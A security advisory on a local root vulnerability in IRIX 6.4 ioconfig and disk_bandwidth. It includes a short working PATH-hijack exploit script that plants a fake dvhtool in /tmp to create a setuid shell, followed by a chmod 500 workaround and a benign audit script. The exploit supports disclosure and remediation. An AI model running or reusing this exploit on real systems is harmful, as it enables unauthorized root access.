COMMAND

    ioconfig and disk_bandwidth

SYSTEMS AFFECTED

    Onyx2 and Origin

PROBLEM

    The IRIX ioconfig(1M) program assigns logical controller numbers
    to all I/O devices on a Silicon Graphics Origin or Onyx2 system.
    The IRIX disk_bandwidth(1M) program is used to determine the
    number of I/O operations that can be performed on a given disk
    device on an Origin or Onyx2 system.  Both programs are normally
    used only by IRIX system administrators.  Unfortunately, a
    vulnerability has been discovered in both the ioconfig(1M) and
    disk_bandwidth(1M) programs that can lead to a root compromise of
    the system.

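    What follows is a simple exploit that takes advantage of the
    programs invoking other programs through system calls without
    specifying a path, so the binary that runs is whichever one comes
    first in the caller's PATH.  This works on both /sbin/ioconfig and
    /sbin/disk_bandwidth.  Credit goes to Loneguard.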

        #!/bin/sh
        #
        # Irix 6.4 ioconfig xploit - Loneguard 04/12/97
        #
        #
        cat > /tmp/dvhtool << 'EOF'
        #!/bin/sh
        /sbin/cp /bin/csh /tmp/xsh
        /sbin/chmod 14755 /tmp/xsh
        EOF
        /sbin/chmod 700 /tmp/dvhtool
        PATH=/tmp:$PATH
        /sbin/ioconfig -f /hw

SOLUTION

    The steps below can be used to remove the vulnerability by
    restricting permissions of the ioconfig(1M)/disk_bandwidth(1M)
    programs to the root user.

        1) Become the root user on the system.
        2) Verify the vulnerable ioconfig(1M)/disk_bandwidth(1M)
           programs are installed.  Only IRIX 6.4 S2MP for Origin/Onyx2
           is vulnerable (uname -R).
        3) Remove permissions on the vulnerable ioconfig(1M) and
           disk_bandwidth(1M) programs (/bin/chmod 500 for both).
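
    Steps 2 and 3 as a script that also verifies the resulting mode.
    This is an added example, not part of the original advisory.  The
    function names are hypothetical, and the release match assumes
    that uname -R output contains both "6.4" and "S2MP".

```shell
#!/bin/sh
# Added example: audit and apply the advisory's chmod 500 workaround.

# The two affected programs, as named in the advisory.
TARGETS="/sbin/ioconfig /sbin/disk_bandwidth"

# First ten characters of `ls -ld`, e.g. "-rwxr-xr-x".
perm_string() {
    ls -ld "$1" | cut -c1-10
}

# Assumption: `uname -R` on the affected release prints a string that
# contains both "6.4" and "S2MP", following the advisory's wording.
is_affected_release() {
    case "$1" in
        *6.4*S2MP*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Restrict one program to mode 500 (read/execute for the owner only)
# and confirm the result. Returns 0 only if the file ends at mode 500.
lock_down() {
    [ -f "$1" ] || { echo "$1: not installed"; return 1; }
    before=$(perm_string "$1")
    if [ "$before" != "-r-x------" ]; then
        chmod 500 "$1" || return 1      # fails unless run by the owner or root
    fi
    after=$(perm_string "$1")
    echo "$1: $before -> $after"
    [ "$after" = "-r-x------" ]
}

# Steps 2 and 3 together; call this as root on the Origin/Onyx2 host.
apply_workaround() {
    is_affected_release "$(uname -R)" || { echo "release not affected"; return 0; }
    rc=0
    for f in $TARGETS; do
        lock_down "$f" || rc=1
    done
    return $rc
}
```

    Nothing runs until apply_workaround is called; a non-zero return
    means at least one program is missing or is still not at mode 500.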